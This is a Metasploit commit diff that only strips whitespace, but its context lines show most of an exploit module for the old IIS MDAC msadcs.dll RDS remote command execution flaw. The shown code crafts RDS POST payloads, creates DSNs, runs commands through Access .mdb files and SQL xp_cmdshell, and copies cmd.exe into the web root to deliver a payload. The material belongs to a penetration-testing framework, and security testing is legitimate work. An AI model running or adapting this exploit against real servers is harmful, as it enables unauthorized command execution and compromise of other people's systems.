Remove whitespace
parent
bedfd6f9eb
commit
6d0dbcb106
|
@ -1,7 +1,3 @@
|
|||
##
|
||||
# $Id$
|
||||
##
|
||||
|
||||
##
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
|
@ -20,7 +16,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def initialize
|
||||
super(
|
||||
'Name' => 'Microsoft IIS MDAC msadcs.dll RDS Arbitrary Remote Command Execution',
|
||||
'Name' => 'Microsoft IIS MDAC msadcs.dll RDS Arbitrary Remote Command Execution',
|
||||
'Description' => %q{
|
||||
This module can be used to execute arbitrary commands on IIS servers
|
||||
that expose the /msadc/msadcs.dll Microsoft Data Access Components
|
||||
|
@ -39,20 +35,19 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
and useful for debugging. Also set NAME to obtain the remote hostname,
|
||||
and METHOD to use the alternative VbBusObj technique.
|
||||
},
|
||||
'Author' => 'patrick',
|
||||
'Version' => '$Revision$',
|
||||
'Platform' => 'win',
|
||||
'References' =>
|
||||
'Author' => 'patrick',
|
||||
'Platform' => 'win',
|
||||
'References' =>
|
||||
[
|
||||
['OSVDB', '272'],
|
||||
['BID', '529'],
|
||||
['CVE', '1999-1011'],
|
||||
['MSB', 'ms98-004'],
|
||||
['MSB', 'ms99-025'],
|
||||
['MSB', 'ms99-025']
|
||||
],
|
||||
'Targets' =>
|
||||
'Targets' =>
|
||||
[
|
||||
# patrickw tested meterpreter OK 20120601
|
||||
# patrickw tested meterpreter OK 20120601
|
||||
# nt4server w/sp3, ie4.02, option pack, IIS4.0, mdac 1.5, over msaccess shell, reverse_nonx
|
||||
# w2k w/sp0, IIS5.0, mdac 2.7 RTM, sql2000, handunsf.reg, over xp_cmdshell, reverse_tcp
|
||||
[ 'Automatic', { } ],
|
||||
|
@ -91,11 +86,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
def create_dsn(drive, dsn)
|
||||
req = "/scripts/tools/newdsn.exe?driver=Microsoft\%2BAccess\%2BDriver\%2B\%28*.mdb\%29\&dsn=#{dsn}\&dbq=#{drive}\%3A\%5Csys.mdb\&newdb=CREATE_DB\&attr="
|
||||
|
||||
|
||||
res = send_request_raw({
|
||||
'uri' => req,
|
||||
'uri' => req,
|
||||
})
|
||||
|
||||
|
||||
if (res and res.code == 200 and res.body =~ /<H2>Datasource creation <B>FAILED! The most likely cause is invalid attributes<\/B><\/H2>/)
|
||||
vprint_error("DSN CREATE failed for drive #{drive} with #{dsn}.")
|
||||
return false
|
||||
|
@ -104,7 +99,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
return true
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
def exec_cmd(sql, cmd, d)
|
||||
boundary = rand_text_alphanumeric(8)
|
||||
method = datastore['METHOD'] ? "VbBusObj.VbBusObjCls.GetRecordset" : "AdvancedDataFactory.Query"
|
||||
|
@ -118,15 +113,15 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
vprint_status("Attempting to request: #{select} on #{d}")
|
||||
|
||||
|
||||
query = "\x02\x00\x03\x00\x08\x00#{[select.size].pack('S')}\x00\x00#{select}\x08\x00#{[dsn.size].pack('S')}\x00\x00#{dsn}"
|
||||
|
||||
sploit = "--#{boundary}\r\n"
|
||||
|
||||
sploit = "--#{boundary}\r\n"
|
||||
sploit << "Content-Type: application/x-varg\r\n"
|
||||
sploit << "Content-Length: #{query.length}\r\n\r\n"
|
||||
sploit << query
|
||||
sploit << "\r\n--#{boundary}--\r\n"
|
||||
|
||||
|
||||
data = "ADCClientVersion:01.06\r\n"
|
||||
data << 'Content-Type: multipart/mixed; boundary=' + boundary +'; num-args=3'
|
||||
data << "\r\n\r\n"
|
||||
|
@ -140,14 +135,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Content-Length' => data.length,
|
||||
'Connection' => "Keep-Alive",
|
||||
},
|
||||
|
||||
'method' => 'POST',
|
||||
'data' => data,
|
||||
|
||||
})
|
||||
|
||||
|
||||
response = Rex::Text.to_ascii(res.body, 'utf-16be')
|
||||
|
||||
|
||||
if (response =~ /HTTP:\/\/www.microsoft.com\/activex.vip\/adofx/ || res.body =~ /o.u.t.p.u.t./)
|
||||
vprint_good("Command was successfully executed! Statement: #{select} Driver: #{d}")
|
||||
return true, sql, d
|
||||
|
@ -190,7 +183,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
vprint_error("Server accepted request however it failed for reasons unknown.")
|
||||
elsif (res.body =~ /\x09\x00\x01/) # magic bytes? rfp used it too :P maybe a retval?
|
||||
vprint_error("Unknown reply - but the command didn't execute")
|
||||
else
|
||||
else
|
||||
vprint_status("Unknown reply - server is likely patched:\n#{response}")
|
||||
end
|
||||
return false
|
||||
|
@ -205,7 +198,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
data = "ADCClientVersion:01.06\r\n"
|
||||
data << 'Content-Type: multipart/mixed; boundary=' + boundary +'; num-args=0'
|
||||
data << "\r\n\r\n--#{boundary}--\r\n"
|
||||
|
||||
|
||||
res = send_request_raw({
|
||||
'uri' => datastore['PATH'] + '/VbBusObj.VbBusObjCls.GetMachineName',
|
||||
'agent' => 'ACTIVEDATA',
|
||||
|
@ -214,12 +207,11 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Content-Length' => data.length,
|
||||
'Connection' => "Keep-Alive",
|
||||
},
|
||||
|
||||
'method' => 'POST',
|
||||
'data' => data,
|
||||
|
||||
|
||||
})
|
||||
|
||||
|
||||
if (res.code == 200 and res.body =~ /\x01(.+)/) # Should return the hostname
|
||||
print_good("Hostname: #{$1}")
|
||||
end
|
||||
|
@ -237,7 +229,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
"\\system32\\ias\\ias.mdb",
|
||||
"\\system32\\ias\\dnary.mdb",
|
||||
"\\system32\\certlog\\certsrv.mdb" ]
|
||||
|
||||
|
||||
mdbs = [ "\\cfusion\\cfapps\\cfappman\\data\\applications.mdb", #these are non-windows
|
||||
"\\cfusion\\cfapps\\forums\\forums_.mdb",
|
||||
"\\cfusion\\cfapps\\forums\\data\\forums.mdb",
|
||||
|
@ -255,16 +247,16 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
"\\perl\\prk\\bookexamples\\modsamp\\database\\contact.mdb",
|
||||
"\\perl\\prk\\bookexamples\\utilsamp\\data\\access\\prk.mdb"
|
||||
]
|
||||
|
||||
|
||||
print_status("Step 1: Trying raw driver to btcustmr.mdb")
|
||||
|
||||
|
||||
drives.each do |drive|
|
||||
sysdirs.each do |sysdir|
|
||||
ret = exec_cmd("Select * from Customers where City=", "cmd /c echo x", "driver={Microsoft Access Driver (*.mdb)};dbq=#{drive}:\\#{sysdir}\\help\\iis\\htm\\tutorial\\btcustmr.mdb;")
|
||||
return ret if (ret)
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
print_status("Step 2: Trying to make our own DSN...")
|
||||
x = false # Stop if we make a DSN
|
||||
drives.each do |drive|
|
||||
|
@ -274,21 +266,21 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
table = rand_text_alphanumeric(3)
|
||||
print_status("Step 3: Trying to create a new table in our own DSN...")
|
||||
exec_cmd("create table #{table} (B int, C varchar(10))", nil, "driver={Microsoft Access Driver (*.mdb)};dbq=c:\\sys.mdb;") # this is general make table query
|
||||
|
||||
|
||||
print_status("Step 4: Trying to execute our command via our own DSN and table...")
|
||||
ret = exec_cmd("select * from #{table} where C=", "cmd /c echo x", "driver={Microsoft Access Driver (*.mdb)};dbq=c:\\sys.mdb;") # this is general exploit table query
|
||||
return ret if (ret)
|
||||
|
||||
|
||||
print_status("Step 5: Trying to execute our command via known DSNs...")
|
||||
dsns.each do |dsn|
|
||||
ret = exec_cmd("select * from MSysModules where name=", "cmd /c echo x", dsn) # this is table-independent query (new)
|
||||
return ret if (ret)
|
||||
end
|
||||
|
||||
|
||||
print_status("Step 6: Trying known system .mdbs...")
|
||||
drives.each do |drive|
|
||||
sysdirs.each do |sysdir|
|
||||
|
@ -299,7 +291,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
print_status("Step 7: Trying known program file .mdbs...")
|
||||
drives.each do |drive|
|
||||
mdbs.each do |mdb|
|
||||
|
@ -308,14 +300,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
return ret if (ret)
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
print_status("Step 8: Trying SQL xp_cmdshell method...")
|
||||
ret = exec_cmd("EXEC master..xp_cmdshell", "cmd /c echo x", "driver={SQL Server};server=(#{datastore['DBHOST']});database=#{datastore['DBNAME']};uid=#{datastore['DBUID']};pwd=#{datastore['DBPASSWORD']}") # based on hdm's sqlrds.pl :)
|
||||
return ret if (ret)
|
||||
|
||||
|
||||
return -1
|
||||
end
|
||||
|
||||
|
||||
def exploit
|
||||
print_status("Searching for valid command execution point...")
|
||||
x = false
|
||||
|
@ -325,10 +317,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
break
|
||||
end
|
||||
end
|
||||
|
||||
|
||||
if (x == true)
|
||||
print_good("Successful command execution found!")
|
||||
|
||||
|
||||
# now copy the file
|
||||
exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
|
||||
print_status("Copying cmd.exe to the web root as \"#{exe_fname}\"...")
|
||||
|
@ -396,7 +388,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
def cleanup
|
||||
framework.events.remove_exploit_subscriber(self)
|
||||
end
|
||||
|
||||
|
||||
def execute_command(cmd, opts = {})
|
||||
# Don't try the start command...
|
||||
# Using the "start" method doesn't seem to make iis very happy :(
|
||||
|
|